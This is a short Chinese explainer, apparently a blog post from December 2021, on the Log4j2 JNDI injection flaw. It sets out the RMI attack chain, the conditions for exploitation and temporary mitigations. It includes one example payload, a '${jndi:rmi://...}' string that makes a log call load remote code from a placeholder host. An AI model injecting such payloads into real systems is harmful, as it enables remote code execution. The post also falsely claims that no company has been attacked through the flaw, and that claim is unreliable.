截止2021.12.20,短短几天Log4j2.x已经连发3个版本,用以修复RCE命令执行漏洞,Log4j2漏洞总体来说是通过JNDI注入恶意代码来完成攻击,具体的操作方式有RMI和LDAP等。
一、攻击原理
以RMI为例,简单阐述下该漏洞的攻击原理:
1、攻击者首先发布一个RMI服务,此服务将绑定一个引用类型的RMI对象。在引用对象中指定一个远程的含有恶意代码的类。
2、攻击者再发布另一个恶意代码下载服务,此服务可以下载所有含有恶意代码的类。
3、攻击者利用Log4j2的漏洞注入RMI调用,例如: log.info("登录成功", "${jndi:rmi://rmi-service:1188/hackedclass}");
4、调用RMI后将获取到引用类型的RMI远程对象,该对象将就加载恶意代码并执行。
二、攻击条件
虽然该漏洞被定义为高危级别,但目前为止还没听说哪个企业由于该漏洞而遭受攻击。该漏洞需要满足以下条件才有可能被攻击:
1、首先使用的是Log4j2的漏洞版本,即 <= 2.16.0的版本。
2、攻击者有机会注入恶意代码,例如系统中记录的日志信息没有任何特殊过滤。
3、攻击者需要发布RMI远程服务和恶意代码下载服务。
4、被攻击者的网络可以访问到RMI服务和恶意代码下载服务,即被攻击者的服务器可以随意访问公网,或者在内网发布过类似的危险服务。
5、被攻击者在JVM中开启了RMI/LDAP等协议的truseURLCodebase属性为ture。
三、修复措施
除了将Log4j2.x升级到最新版本外,还可以采取如下临时修复措施(任选其一)。
1、添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true
2、在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true
3、禁用JNDI,如在spring.properties里添加spring.jndi.ignore=true